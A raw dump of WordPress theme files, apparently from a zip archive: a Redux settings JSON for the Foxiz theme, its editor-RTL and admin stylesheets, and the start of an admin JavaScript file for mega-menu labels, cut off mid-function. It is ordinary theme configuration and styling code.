_length":"12","list_1_excerpt_source":"0","list_1_readmore":false,"list_1_title_tag":"0","list_1_hide_category":false,"list_1_mobile_hide_meta":[],"list_1_hide_excerpt":true,"heading_layout":"1","font_heading":[],"single_post_layout":"standard_1","single_post_video_layout":"video_1","single_post_video_autoplay":1,"single_post_video_float":1,"single_post_audio_layout":"audio_1","single_post_audio_autoplay":1,"single_post_gallery_layout":"gallery_1","single_post_line_length":1,"single_post_width_wo_sb":"small","hyperlink_style":"0","hyperlink_line":"1","single_post_quick_view":1,"single_post_tags":1,"single_post_sources":1,"single_post_via":1,"single_post_newsletter":"0","single_post_newsletter_title":"Sign Up For Daily Newsletter","single_post_newsletter_description":"Be keep up! Get the latest breaking news delivered straight to your inbox.","single_post_newsletter_code":"[mc4wp_form]","single_post_newsletter_policy":"By signing up, you agree to our Terms of Use and acknowledge the data practices in our Privacy Policy. You may unsubscribe at any time.","single_post_author_card":0,"single_post_next_prev":"0","single_post_next_prev_mobile":"1","single_post_sidebar_name":"foxiz_sidebar_default","single_post_sidebar_position":"default","single_post_sticky_sidebar":"default","single_post_entry_category":"bg-1,big","single_post_primary_category":0,"tagline_tag":"h2","single_post_avatar":1,"single_post_entry_meta":["author","date"],"single_post_meta_author_label":"0","single_post_author_job":1,"single_post_mobile_hide_meta":[],"single_post_updated_meta":1,"single_post_update_format":"","single_post_min_read":0,"sponsor_meta_text":"Sponsored by","single_post_sponsor_redirect":"0","single_post_review_type":"star","user_can_review":1,"single_post_comment_button":"0","single_post_user_can_review":"0","single_post_comment":"0","single_post_related":1,"single_post_related_blog_heading":"You Might Also Like","single_post_related_blog_heading_layout":"0","single_post_related_heading_tag":"0","single_post_related_blog_heading_size":"","single_post_related_layout":"grid_small_1","single_post_related_where":"all","single_post_related_total":4,"single_post_related_pagination":"0","single_post_popular":1,"single_post_ajax_next_post":"0","ajax_next_button":"1","ajax_next_cat":"0","ajax_next_sidebar_name":"foxiz_sidebar_default","ajax_next_related":"0","ajax_next_hide_sidebar":1,"ajax_next_comment_button":1,"share_top":1,"share_top_color":1,"share_top_facebook":1,"share_top_twitter":1,"share_top_pinterest":"0","share_top_whatsapp":"0","share_top_linkedin":"0","share_top_tumblr":"0","share_top_reddit":"0","share_top_vk":"0","share_top_telegram":"0","share_top_email":1,"share_top_print":1,"share_bottom":1,"share_bottom_color":1,"share_bottom_facebook":1,"share_bottom_twitter":1,"share_bottom_pinterest":"0","share_bottom_whatsapp":"0","share_bottom_linkedin":"0","share_bottom_tumblr":"0","share_bottom_reddit":"0","share_bottom_vk":"0","share_bottom_telegram":"0","share_bottom_email":1,"share_bottom_print":1,"share_left":1,"share_left_color":1,"share_left_facebook":1,"share_left_twitter":1,"share_left_pinterest":"0","share_left_whatsapp":"0","share_left_linkedin":"0","share_left_tumblr":"0","share_left_reddit":"0","share_left_vk":"0","share_left_telegram":"0","share_left_email":1,"share_left_print":1,"single_post_sticky_title":1,"share_sticky":1,"share_sticky_color":1,"share_sticky_facebook":1,"share_sticky_twitter":1,"share_sticky_pinterest":"0","share_sticky_whatsapp":"0","share_sticky_linkedin":"0","share_sticky_tumblr":"0","share_sticky_reddit":"0","share_sticky_vk":"0","share_sticky_telegram":"0","share_sticky_email":1,"share_sticky_print":1,"single_post_reading_indicator":1,"reading_indicator_height":"","reading_indicator_color":{"from":"","to":""},"single_post_highlight_shares":1,"single_post_highlight_share_facebook":1,"single_post_highlight_share_twitter":1,"single_post_highlight_share_reddit":1,"single_post_header_style":"0","single_font_resizer":"1","page_page_header_style":"1","page_width_wo_sb":"small","page_sidebar_position":"none","page_sidebar_name":"foxiz_sidebar_default","page_sticky_sidebar":"default","category_header_style":"0","category_category_header":"1","category_pattern":"dot","category_subcategory":1,"category_template":"","category_template_display":"1","category_blog_heading":"Latest {category} News","category_blog_heading_layout":"0","category_blog_heading_tag":"0","category_blog_heading_size":"","category_posts_per_page":"","category_pagination":"number","category_layout":"grid_1","category_columns":"0","category_columns_tablet":"0","category_columns_mobile":"0","category_column_gap":"0","category_sidebar_position":"none","category_sidebar_name":"foxiz_sidebar_default","category_sticky_sidebar":"0","category_crop_size":"0","category_display_ratio":"","category_entry_category":"0","category_entry_meta_bar":"0","category_entry_meta":[],"category_review":"0","category_review_meta":"0","category_entry_format":"0","category_bookmark":"0","category_excerpt":"0","category_excerpt_length":"-1","category_excerpt_source":"0","category_readmore":"0","category_title_tag":"0","category_title_size":"","category_title_size_tablet":"","category_title_size_mobile":"","category_hide_category":"0","category_mobile_hide_meta":"","category_hide_excerpt":"0","blog_header_style":"0","blog_template":"","blog_template_display":"1","blog_posts_per_page":"","blog_pagination":"number","blog_layout":"classic_1","blog_columns":"0","blog_columns_tablet":"0","blog_columns_mobile":"0","blog_column_gap":"0","blog_sidebar_position":"default","blog_sidebar_name":"foxiz_sidebar_default","blog_sticky_sidebar":"0","blog_crop_size":"0","blog_display_ratio":"","blog_entry_category":"0","blog_entry_meta_bar":"0","blog_entry_meta":[],"blog_review":"0","blog_review_meta":"0","blog_entry_format":"0","blog_bookmark":"0","blog_excerpt":"0","blog_excerpt_length":"-1","blog_excerpt_source":"0","blog_readmore":"0","blog_title_tag":"0","blog_title_size":"","blog_title_size_tablet":"","blog_title_size_mobile":"","blog_hide_category":"0","blog_mobile_hide_meta":"","blog_hide_excerpt":"0","author_bio":1,"author_pattern":"dot","author_posts_per_page":"","author_pagination":"number","author_layout":"grid_1","author_columns":"0","author_columns_tablet":"0","author_columns_mobile":"0","author_column_gap":"0","author_sidebar_position":"none","author_sidebar_name":"foxiz_sidebar_default","author_sticky_sidebar":"0","author_crop_size":"0","author_display_ratio":"","author_entry_category":"0","author_entry_meta_bar":"0","author_entry_meta":[],"author_review":"0","author_review_meta":"0","author_entry_format":"0","author_bookmark":"0","author_excerpt":"0","author_excerpt_length":"-1","author_excerpt_source":"0","author_readmore":"0","author_title_tag":"0","author_title_size":"","author_title_size_tablet":"","author_title_size_mobile":"","author_hide_category":"0","author_mobile_hide_meta":"","author_hide_excerpt":"0","search_only_post":true,"search_header_style":"0","search_header_background":{"background-color":"","background-size":"cover","background-attachment":"scroll","background-position":"center center","background-repeat":"no-repeat"},"dark_search_header_background":{"background-color":"","background-size":"cover","background-attachment":"scroll","background-position":"center center","background-repeat":"no-repeat"},"search_posts_per_page":"","search_pagination":"number","search_layout":"grid_small_1","search_columns":"0","search_columns_tablet":"0","search_columns_mobile":"0","search_column_gap":"0","search_sidebar_position":"none","search_sidebar_name":"foxiz_sidebar_default","search_sticky_sidebar":"0","search_crop_size":"0","search_display_ratio":"","search_entry_category":"0","search_entry_meta_bar":"0","search_entry_meta":[],"search_review":"0","search_review_meta":"0","search_entry_format":"0","search_bookmark":"0","search_excerpt":"0","search_excerpt_length":"-1","search_excerpt_source":"0","search_readmore":"0","search_title_tag":"0","search_title_size":"","search_title_size_tablet":"","search_title_size_mobile":"","search_hide_category":"0","search_mobile_hide_meta":"","search_hide_excerpt":"0","archive_pattern":"dot","archive_posts_per_page":"","archive_pagination":"number","archive_layout":"grid_1","archive_columns":"0","archive_columns_tablet":"0","archive_columns_mobile":"0","archive_column_gap":"0","archive_sidebar_position":"none","archive_sidebar_name":"foxiz_sidebar_default","archive_sticky_sidebar":"0","archive_crop_size":"0","archive_display_ratio":"","archive_entry_category":"0","archive_entry_meta_bar":"0","archive_entry_meta":[],"archive_review":"0","archive_review_meta":"0","archive_entry_format":"0","archive_bookmark":"0","archive_excerpt":"0","archive_excerpt_length":"-1","archive_excerpt_source":"0","archive_readmore":"0","archive_title_tag":"0","archive_title_size":"","archive_title_size_tablet":"","archive_title_size_mobile":"","archive_hide_category":"0","archive_mobile_hide_meta":"","archive_hide_excerpt":"0","page_404_heading":"","page_404_description":"","page_404_search":1,"font_body":[],"font_h1":[],"font_h2":[],"font_h3":[],"font_h4":[],"font_h5":[],"font_h6":[],"font_ecat":[],"font_eauthor":[],"font_input":[],"font_button":[],"font_breadcrumb":[],"font_headline":[],"font_tagline":[],"font_quote":[],"font_main_menu":[],"font_main_sub_menu":[],"font_mobile_menu":[],"font_mobile_sub_menu":[],"font_quick_access_menu":[],"font_widget":[],"login_screen_style":"0","logo_redirect":"","login_screen_bg":{"background-size":"cover","background-attachment":"fixed","background-repeat":"no-repeat","background-position":"center center"},"login_color":"","login_redirect":"","logout_redirect":"","remove_admin_bar":1,"table_contents_post":1,"table_contents_page":"0","table_contents_h1":1,"table_contents_h2":1,"table_contents_h3":1,"table_contents_h4":1,"table_contents_h5":1,"table_contents_h6":1,"table_contents_layout":"1","table_contents_enable":2,"table_contents_heading":"Contents","table_contents_position":"1","table_contents_hierarchy":1,"table_contents_numlist":1,"single_post_reaction":"0","single_post_reaction_title":"","reaction_items":{"enabled":{"love":"Love","sad":"Sad","happy":"Happy","sleepy":"Sleepy","angry":"Angry","dead":"Dead","wink":"Wink"},"disabled":{"cry":"Cry","embarrass":"Embarrass","joy":"Joy","shy":"Shy","surprise":"Surprise"}},"bookmark_system":1,"bookmark_notification":1,"bookmark_enable_when":"0","bookmark_logged_redirect":"","bookmark_expiration":"60","saved_heading":"Reading List","saved_description":"you'll find all saved articles here.","saved_pattern":"dot","saved_layout":"grid_1","saved_columns":"0","saved_columns_tablet":"0","saved_columns_mobile":"0","saved_column_gap":"0","saved_sidebar_position":"none","saved_sidebar_name":"foxiz_sidebar_default","saved_sticky_sidebar":"0","saved_crop_size":"0","saved_display_ratio":"","saved_entry_category":"0","saved_entry_meta_bar":"0","saved_entry_meta":[],"saved_review":"0","saved_review_meta":"0","saved_entry_format":"0","saved_bookmark":"0","saved_excerpt":"0","saved_excerpt_length":"-1","saved_excerpt_source":"0","saved_readmore":"0","saved_title_tag":"0","saved_title_size":"","saved_title_size_tablet":"","saved_title_size_mobile":"","saved_hide_category":"0","saved_mobile_hide_meta":"","saved_hide_excerpt":"0","interest_heading":"Your Categories","interest_description":"Follow categories that you're interested in","interest_url":"#","interest_pattern":"dot","recommended_blog_heading":"Recommended for You","recommended_blog_heading_layout":"0","recommended_blog_heading_tag":"0","recommended_blog_heading_size":"","recommended_posts_per_page":"9","recommended_pagination":"infinite_scroll","recommended_layout":"grid_1","recommended_columns":"0","recommended_columns_tablet":"0","recommended_columns_mobile":"0","recommended_column_gap":"0","recommended_sidebar_position":"none","recommended_sidebar_name":"foxiz_sidebar_default","recommended_sticky_sidebar":"0","recommended_crop_size":"0","recommended_display_ratio":"","recommended_entry_category":"0","recommended_entry_meta_bar":"0","recommended_entry_meta":[],"recommended_review":"0","recommended_review_meta":"0","recommended_entry_format":"0","recommended_bookmark":"0","recommended_excerpt":"0","recommended_excerpt_length":"-1","recommended_excerpt_source":"0","recommended_readmore":"0","recommended_title_tag":"0","recommended_title_size":"","recommended_title_size_tablet":"","recommended_title_size_mobile":"","recommended_hide_category":"0","recommended_mobile_hide_meta":"","recommended_hide_excerpt":"0","facebook":"#","twitter":"#","youtube":"#","pinterest":"","custom_social_1_icon":"","custom_social_2_icon":"","custom_social_3_icon":"","breadcrumb":1,"single_post_breadcrumb":"1","single_page_breadcrumb":"0","category_breadcrumb":"1","author_breadcrumb":"1","archive_breadcrumb":"1","privacy_bar":"0","privacy_position":"left","privacy_text":"By using this site, you agree to the Privacy Policy and Terms of Use.","privacy_bg_color":"","privacy_text_color":"","dark_privacy_bg_color":"","dark_privacy_text_color":"","dark_mode":0,"dark_mode_image_opacity":"0","dark_mode_default":0,"newsletter_popup":"0","newsletter_title":"Join Us!","newsletter_description":"Subscribe to our newsletter and never miss our latest news, podcasts etc..","newsletter_shortcode":"[mc4wp_form]","newsletter_footer":"Zero spam, Unsubscribe at any time.","newsletter_footer_url":"","newsletter_popup_expired":1,"newsletter_popup_display":"scroll","newsletter_popup_offset":"2000","newsletter_popup_delay":"","lazy_load":1,"disable_srcset":1,"disable_dashicons":1,"disable_block_style":1,"disable_polyfill":1,"preload_gfonts":1,"preload_font_icon":1,"disable_default_fonts":0,"disable_default_style":1,"css_file":0,"organization_markup":1,"website_markup":1,"site_breadcrumb":1,"site_itemlist":1,"single_post_article_markup":1,"single_post_review_markup":1,"site_description":"","site_phone":"","site_email":"","site_locality":"","site_street":"","postal_code":"","open_graph":1,"facebook_app_id":"","adblock_detector":0,"adblock_title":"AdBlock Detected","adblock_description":"Our site is an advertising supported site. Please whitelist to support our site.","ad_top_type":"1","ad_top_code":"","ad_top_size":"0","ad_top_desktop_size":"1","ad_top_tablet_size":"2","ad_top_mobile_size":"3","ad_top_image":"","ad_top_dark_image":"","ad_top_destination":"#","ad_top_width":"","ad_top_bg":"","ad_top_dark_bg":"","ad_top_spacing":"0","info_add_favico":"","logo":"","dark_logo":"","retina_logo":"","dark_retina_logo":"","mobile_logo":"","dark_mobile_logo":"","transparent_logo":"","transparent_retina_logo":"","icon_touch_apple":"","icon_touch_metro":"","section_start_header_style":"","section_end_header_style":"","section_start_header_sticky":"","section_end_header_sticky":"","section_start_hd1_general":"","section_end_hd1_general":"","section_start_hd1_colors":"","hd1_color":"","hd1_color_hover":"","hd1_color_hover_accent":"","hd1_sub_color":"","hd1_sub_color_hover":"","section_end_hd1_colors":"","section_start_hd1_dark_colors":"","dark_hd1_color":"","dark_hd1_color_hover":"","dark_hd1_color_hover_accent":"","dark_hd1_sub_color":"","dark_hd1_sub_color_hover":"","section_end_hd1_dark_colors":"","section_start_hd1_transparent":"","transparent_hd1_info":"","transparent_hd1_color":"","transparent_hd1_color_hover":"","transparent_hd1_color_hover_accent":"","section_end_hd1_transparent":"","info_mobile_navbar_typo":"","section_start_mh_layout":"","section_end_mh_layout":"","section_start_mobile_collapse":"","info_mobile_socials_list":"","section_end_mobile_collapse":"","section_start_mh_colors":"","mobile_color":"","mobile_sub_color":"","section_end_mh_colors":"","section_start_mh_dark_colors":"","dark_mobile_color":"","dark_mobile_sub_color":"","section_end_mh_dark_colors":"","info_more_section":"","info_search_placeholder":"","header_search_custom_icon":"","header_login_logo":"","header_login_dark_logo":"","alert_bg":"","alert_color":"","dark_alert_bg":"","dark_alert_color":"","section_start_footer_layout":"","section_end_footer_layout":"","section_start_footer_bottom":"","footer_logo":"","dark_footer_logo":"","section_end_footer_bottom":"","section_start_footer_copyright":"","category_color_notice":"","section_start_meta_icons":"","section_end_meta_icons":"","section_start_reading_speed":"","section_end_reading_speed":"","section_start_human_time":"","section_end_human_time":"","section_start_edit_link":"","section_end_edit_link":"","section_start_lazy_load":"","custom_crop_size_information":"","section_end_lazy_load":"","section_start_feat_size":"","image_size_information":"","section_end_feat_size":"","icon_video_color":"","icon_gallery_color":"","icon_audio_color":"","classic_1_info":"","grid_1_info":"","grid_small_1_info":"","list_2_info":"","list_old2_info":"","list_1_info":"","multi_sidebar_notice":"","heading_color":"","heading_sub_color":"","dark_heading_color":"","dark_heading_sub_color":"","font_heading_size_mobile":"","font_heading_size_tablet":"","global_color":"","dark_global_color":"","accent_color":"","dark_accent_color":"","dark_background":"","review_color":"","foxiz_config_section_start_sp_default":"","foxiz_config_section_end_sp_default":"","foxiz_config_section_start_sp_video":"","foxiz_config_section_end_sp_video":"","foxiz_config_section_start_sp_audio":"","foxiz_config_section_end_sp_audio":"","foxiz_config_section_start_sp_gallery":"","foxiz_config_section_end_sp_gallery":"","section_start_single_content_width":"","section_end_start_single_content_width":"","section_start_single_hyperlink":"","hyperlink_color":"","dark_hyperlink_color":"","hyperlink_line_color":"","dark_hyperlink_line_color":"","section_end_single_hyperlink":"","section_start_single_section_qv":"","section_end_single_section_qv":"","section_start_single_section_footer":"","section_end_single_section_footer":"","section_start_single_newsletter":"","section_end_single_newsletter":"","section_start_single_box":"","section_end_single_box":"","info_tagline_typo":"","section_start_single_meta_info":"","section_end_single_meta_info":"","section_start_single_updated_meta":"","section_end_single_updated_meta":"","section_start_single_min_read":"","section_end_single_min_read":"","single_post_review_image":"","section_start_single_post_related":"","section_end_single_post_related":"","section_start_single_post_popular":"","single_post_popular_shortcode":"","section_end_single_post_popular":"","section_start_single_post_social_top":"","section_end_single_post_social_top":"","section_start_single_post_social_bottom":"","section_end_single_post_social_bottom":"","section_start_single_post_social_left":"","section_end_single_post_social_left":"","single_post_header_settings_notice":"","section_start_page_header":"","section_end_page_header":"","section_start_page_sidebar":"","section_end_page_sidebar":"","category_settings_notice":"","section_start_category_site_header":"","section_end_category_site_header":"","section_start_category_header":"","category_featured_image":"","section_end_category_header":"","section_start_category_template":"","section_end_category_template":"","section_start_category_blog_header":"","section_end_category_blog_header":"","section_start_category_blog_pagination":"","section_end_category_blog_pagination":"","section_start_category_blog_layout":"","section_end_category_layout":"","section_start_category_blog_sidebar":"","section_end_category_blog_sidebar":"","section_start_category_design":"","category_layout_info":"","section_end_category_design":"","section_start_blog_header":"","section_end_blog_header":"","section_start_blog_builder":"","section_end_blog_builder":"","section_start_blog_pagination":"","section_end_blog_pagination":"","section_start_blog_blog_layout":"","section_end_blog_blog_layout":"","section_start_blog_sidebar":"","section_end_blog_sidebar":"","section_start_blog_design":"","blog_layout_info":"","section_end_blog_design":"","section_start_author_header":"","section_end_author_header":"","section_start_author_pagination":"","section_end_author_pagination":"","section_start_author_layout":"","section_end_author_layout":"","section_start_author_sidebar":"","section_end_author_sidebar":"","section_start_author_design":"","author_layout_info":"","section_end_author_design":"","section_start_search_filter":"","section_end_search_filter":"","section_start_search_site_header":"","section_end_search_site_header":"","section_start_search_header":"","section_end_search_header":"","section_start_search_pagination":"","section_end_search_pagination":"","section_start_search_layout":"","section_end_search_layout":"","section_start_search_sidebar":"","section_end_search_sidebar":"","section_start_search_design":"","search_layout_info":"","section_end_search_design":"","section_start_archive_header":"","section_end_archive_header":"","section_start_archive_pagination":"","section_end_archive_pagination":"","section_start_archive_blog_layout":"","section_end_archive_blog_layout":"","section_start_archive_sidebar":"","section_end_archive_sidebar":"","section_start_archive_design":"","archive_layout_info":"","section_end_archive_design":"","page_404_featured_info":"","page_404_featured":"","page_404_dark_featured":"","font_body_size_mobile":"","font_body_size_tablet":"","font_h1_size_mobile":"","font_h1_size_tablet":"","font_h2_size_mobile":"","font_h2_size_tablet":"","font_h3_size_mobile":"","font_h3_size_tablet":"","font_h4_size_mobile":"","font_h4_size_tablet":"","font_h5_size_mobile":"","font_h5_size_tablet":"","font_h6_size_mobile":"","font_h6_size_tablet":"","font_ecat_size_mobile":"","font_ecat_size_tablet":"","font_emeta":"","font_emeta_size_mobile":"","font_emeta_size_tablet":"","typo_excerpt_info":"","font_excerpt_size":"","font_excerpt_size_mobile":"","font_excerpt_size_tablet":"","font_readmore":"","font_readmore_size_mobile":"","font_readmore_size_tablet":"","section_start_font_input":"","font_input_size_mobile":"","font_input_size_tablet":"","section_end_font_input":"","section_start_font_button":"","font_button_size_mobile":"","font_button_size_tablet":"","section_end_font_button":"","font_breadcrumb_size_mobile":"","font_breadcrumb_size_tablet":"","section_start_font_single_headline":"","typo_single_info":"","font_headline_size_content":"","font_headline_size_mobile":"","font_headline_size_tablet":"","section_end_font_single_headline":"","section_start_font_single_tagline":"","typo_tagline_info":"","font_tagline_size_content":"","font_tagline_size_mobile":"","font_tagline_size_tablet":"","section_end_font_tagline":"","section_start_font_single_quote":"","section_end_font_quote":"","section_start_section_font_main_menu":"","section_end_section_font_main_menu":"","section_start_section_font_mobile_menu":"","section_end_section_font_mobile_menu":"","section_start_section_font_quick_access_menu":"","section_end_section_font_quick_access_menu":"","font_widget_size_mobile":"","font_widget_size_tablet":"","section_start_login_screen":"","login_screen_logo":"","section_start_login_redirect":"","section_end_login_screen":"","section_start_table_contents_ptype":"","section_end_table_contents_ptype":"","section_start_table_contents_heading":"","section_end_table_contents_heading":"","section_start_table_contents_layout":"","table_contents_scroll":"","section_end_table_contents_layout":"","section_start_bookmark_saved":"","saved_image":"","saved_image_dark":"","section_end_bookmark_saved":"","section_start_saved_layout":"","section_end_saved_layout":"","section_start_saved_sidebar":"","section_end_saved_sidebar":"","section_start_saved_design":"","saved_layout_info":"","section_end_saved_design":"","interest_image":"","interest_image_dark":"","section_start_recommended_heading":"","section_end_recommended_heading":"","section_start_recommended_pagination":"","section_end_recommended_pagination":"","section_start_recommended_layout":"","section_end_recommended_layout":"","section_start_recommended_sidebar":"","section_end_recommended_sidebar":"","section_start_recommended_design":"","recommended_layout_info":"","section_end_recommended_design":"","section_start_socials":"","instagram":"","linkedin":"","tumblr":"","flickr":"","skype":"","snapchat":"","myspace":"","bloglovin":"","digg":"","dribbble":"","soundcloud":"","vimeo":"","reddit":"","vk":"","telegram":"","whatsapp":"","rss":"","section_end_socials":"","section_start_custom_socials":"","custom_socials_info":"","custom_social_1_url":"","custom_social_1_name":"","custom_social_1_color":"","custom_social_2_url":"","custom_social_2_name":"","custom_social_2_color":"","custom_social_3_url":"","custom_social_3_name":"","custom_social_3_color":"","section_end_custom_socials":"","section_start_breadcrumb_global":"","breadcrumb_info":"","section_end_breadcrumb_global":"","section_start_page_breadcrumb":"","section_end_page_breadcrumb":"","dark_mode_notice":"","newsletter_cover_info":"","newsletter_cover":"","performance_info":"","section_start_seo_snippets":"","section_end_seo_snippets":"","section_start_seo_information":"","section_end_seo_information":"","section_start_og_tag":"","facebook_default_img":"","section_end_og_tag":"","info_advertising":"","section_start_ad_top":"","section_end_ad_top":"","redux_import_export":"","redux-backup":1}PK!a8 8 assets/admin/editor-rtl.cssnu[.editor-styles-wrapper ul, .editor-styles-wrapper ol { margin-right: 0; margin-left: auto; } .editor-styles-wrapper .block-library-list ol, .editor-styles-wrapper .block-library-list ul { padding-left: 0; padding-right: 1em; } .editor-styles-wrapper .wp-caption-text { margin-right: 0; margin-left: auto; } .editor-styles-wrapper .wp-block-quote.is-large .wp-block-quote__citation { text-align: right; } .editor-styles-wrapper .wp-block-quote.has-text-align-left { text-align: right; } .editor-styles-wrapper .wp-block-quote__citation:before, .wp-block-pullquote__citation:before { margin-left: 7px; margin-right: 0; } .editor-styles-wrapper .wp-block-quote.is-large, .wp-block-quote.is-style-large { text-align: right; } .editor-styles-wrapper .wp-block-quote.has-text-align-right { text-align: left !important; } .wp-block-image figcaption, .wp-block-embed figcaption { padding: 5px 10px 0 10px; } .editor-styles-wrapper .wp-caption-text:before, .editor-styles-wrapper .wp-block-image figcaption:before { margin-left: 5px; } .editor-styles-wrapper .wp-block-audio figcaption:before { margin-left: 5px; } .editor-styles-wrapper .wp-block-file .wp-block-file__textlink { margin-right: 0; margin-left: auto; } .editor-styles-wrapper table.wp-block-table { border-right: 1px solid rgba(0, 0, 0, .025); border-left: none; } .editor-styles-wrapper .wp-block-table .wp-block-table__cell-conten { text-align: right; } .editor-styles-wrapper ul.wp-block-archives, .editor-styles-wrapper ul.wp-block-archives-dropdown, .editor-styles-wrapper ul.wp-block-categories, .editor-styles-wrapper ul.wp-block-latest-posts, .editor-styles-wrapper .wp-block-latest-comments { margin-right: 0; margin-left: auto; } .editor-styles-wrapper ul.wp-block-categories, .editor-styles-wrapper ul.wp-block-archives, .editor-styles-wrapper ul.wp-block-categories li, .editor-styles-wrapper ul.wp-block-archives li, .editor-styles-wrapper ul.wp-block-latest-posts li { text-align: right; } .editor-styles-wrapper .wp-block-categories__list a:after, .editor-styles-wrapper .wp-block-archives-list a:after { margin-right: 7px; margin-left: 0; } .editor-styles-wrapper .wp-block-categories-list ul ul, .editor-styles-wrapper .wp-block-archives-list ul ul { margin-right: 15px; margin-left: 0; } .editor-styles-wrapper .wp-block-categories__post-count, .editor-styles-wrapper .wp-block-archives__post-count { float: left; }PK!%22assets/admin/admin.cssnu[.clearfix::after { display: table; clear: both; content: ''; } .w-img-preview { display: block; -webkit-box-sizing: border-box; box-sizing: border-box; margin-top: 10px; margin-bottom: 10px; } .w-img-preview img { display: block; width: 100%; } input.w-upload-img { display: inline-block; width: 74%; min-height: 40px; border: 1px dashed #ddd !important; box-shadow: none !important; } input.w-clear-img { display: inline-block; width: 25%; min-height: 40px; border: 1px dashed #ddd !important; box-shadow: none !important; } input.w-clear-img:after { display: table; clear: both; width: 100%; content: ''; } .rb-category-settings { display: block; overflow: hidden; margin-top: 10px; margin-bottom: 30px; padding-bottom: 20px; -webkit-border-radius: 5px; border-radius: 5px; background-color: #fff; -moz-box-shadow: 0 4px 30px rgba(0, 0, 0, .07); -webkit-box-shadow: 0 4px 30px rgba(0, 0, 0, .07); box-shadow: 0 4px 30px rgba(0, 0, 0, .07); } .rb-category-settings .form-table th { min-width: 240px; padding: 15px 20px; } .rb-category-settings .description { font-size: 11px; font-weight: 400; line-height: 1.7; display: block; margin-top: 5px; } .rb-category-settings label { font-size: 12px; display: block; } .rb-category-settings tr:not(:last-child) { border-bottom: 1px solid #f2f2f2; } .rb-category-header { font-size: 15px; display: block; margin-top: 0; margin-bottom: 0; padding: 15px 20px; color: #fff; background-color: #363a42; } .rb-category-settings tr.type-info { background-color: #0071b7; } .rb-category-settings tr.type-info th { padding: 7px 20px !important; } .rb-category-settings tr.type-info label { font-size: 13px; display: flex; align-items: center; color: #fff; } .rb-category-settings tr.type-info label:before { display: inline-flex; width: 15px; height: 2px; margin-right: 5px; content: ''; background-color: #fff; } .rb-category-settings select, .rb-category-settings input, .rb-category-settings .rwtm-image-upload { font-size: 12px; } .rb-category-info { margin: 0; padding: 10px 20px; color: #fff; background-color: #7b8291; } .rb-category-settings .form-table { margin-top: 0; } [id$="widget-mc-__i__"] .widget-top .widget-title h3, [id$="instagram-__i__"] .widget-top .widget-title h3 { color: #fff; background-color: #4ea9fe; } [id$="widget-template-__i__"] .widget-top .widget-title h3 { color: #fff; background-color: #8040ff; } [id$="youtube-__i__"] .widget-top .widget-title h3, [id$="weather-__i__"] .widget-top .widget-title h3, [id$="twitter-__i__"] .widget-top .widget-title h3, [id$="social-icon-__i__"] .widget-top .widget-title h3, [id$="follower-__i__"] .widget-top .widget-title h3, [id$="flickr-__i__"] .widget-top .widget-title h3, [id$="widget-banner-__i__"] .widget-top .widget-title h3, [id$="ad-script-__i__"] .widget-top .widget-title h3, [id$="ad-image-__i__"] .widget-top .widget-title h3, [id$="address-__i__"] .widget-top .widget-title h3, [id$="facebook-__i__"] .widget-top .widget-title h3, [id$="post-__i__"] .widget-top .widget-title h3, [id$="sb-instagram-__i__"] .widget-top .widget-title h3 { color: #fff; background-color: #4792a8; } #foxiz_sidebar_fw_footer .sidebar-name h2 { color: #4ea9fe; } .menu-item-settings:after { display: table; clear: both; content: ''; } .field-ruby-mega.description-wide input { display: block; width: 100%; margin-top: 5px; margin-bottom: 10px; } .field-ruby-mega-info { font-size: 12px; display: block; overflow: hidden; margin: 20px 20px 10px 0; padding: 10px; border-radius: 4px; background-color: #fff7d3; } .rtl .field-ruby-mega-info { margin: 20px 0 10px 20px; } .rb-w-input { display: block; margin-bottom: 10px; } .rb-w-input h4 { font-size: 13px; margin-bottom: 0; } .rb-w-input p { margin-top: 7px; margin-bottom: 7px; } .rb-w-input label { display: none; } /** menu */ .rb-menu-settings { position: relative; display: block; margin-bottom: 15px; padding-bottom: 10px; border-bottom: 1px solid #ddd; } .rb-fw-input { max-width: 100%; width: 100%; } .rb-menu-el label { font-size: 11px; font-weight: bold; padding-right: 10px; } .rb-mega-title { font-size: 14px; display: block; margin-top: 12px; margin-bottom: 10px; padding-top: 12px; border-top: 1px solid #ddd; } .rb-menu-el ::placeholder { color: #aaa; } .rb-menu-el { display: flex; align-items: center; flex-flow: row wrap; width: 100%; margin-bottom: 12px; } .rb-menu-el textarea { width: 100%; margin-bottom: 10px; } .rb-menu-elements { display: block; } .rb-menu-el input, .rb-menu-el select { flex-grow: 1; max-width: 210px; margin-left: auto; } .rb-menu-description { font-size: 12px; font-style: italic; display: block; margin-top: 10px; margin-bottom: 15px; color: #777; } .rb-mega-info { font-size: 9px; line-height: 1; display: inline-flex; margin-left: 10px; padding: 4px 8px; color: #fff; border-radius: 5px; background-color: #5fc08b; } .rb-mega-info.label-columns { background-color: #8e82e5; } .rb-menu-item-description { font-size: 11px; display: block; margin-top: 7px; } .rb-menu-settings textarea { font-size: 12px; } /** widget section colors */ #foxiz_entry_top .sidebar-name h2, #foxiz_entry_bottom .sidebar-name h2 { color: #93a340; } #foxiz_sidebar_more .sidebar-name h2, #foxiz_sidebar_default .sidebar-name h2, #foxiz_sidebar_footer_1 .sidebar-name h2, #foxiz_sidebar_footer_2 .sidebar-name h2, #foxiz_sidebar_footer_3 .sidebar-name h2, #foxiz_sidebar_footer_4 .sidebar-name h2, #foxiz_sidebar_footer_5 .sidebar-name h2 { color: #4792a8; } #foxiz_sidebar_topsite .sidebar-name h2 { color: #668839; } #ui-datepicker-div { display: none } .rwtm-uploaded { overflow: hidden; margin: 10px 0 10px } .rwtm-files { padding-left: 20px } .rwtm-images li { position: relative; float: left; width: 100px; height: 70px; margin: 0 10px 10px 0; text-align: center; border: 3px solid #9ed1bc; } .rwtm-images img { display: block; width: 100%; height: 100%; object-fit: contain; } .rwtm-images a { font-weight: bold; position: absolute; right: 0; bottom: 0; padding: 5px; -webkit-transition: all .3s; transition: all .3s; color: #fff; background: #000; } .rwtm-images a:hover { background-color: #ff4b4b; } .rb-category-settings .wp-picker-open + .wp-picker-input-wrap { display: inline-flex; } .rb-category-settings .small { max-width: 100px; } .rb-category-settings *::placeholder { color: #aaa; } .rb-category-settings select { min-width: 100px; }PK!5t==assets/admin/admin.jsnu[/** backend */ var FOXIZ_DASHBOARD_SCRIPTS = (function (Module, $) { 'use strict'; Module.init = function () { this.megaMenuInfo(); }; /** * mega menu information */ Module.megaMenuInfo = function () { let self = this; $('.rb-menu-setting').each(function () { let target = $(this); let titleWrap = target.parents('.menu-item').find('.item-title'); if (target.val().length && target.val() != 0) { self.addMenuInfo(target, titleWrap); } target.on('change', function () { if (target.val().length && target.val() != 0) { self.addMenuInfo(target, titleWrap, 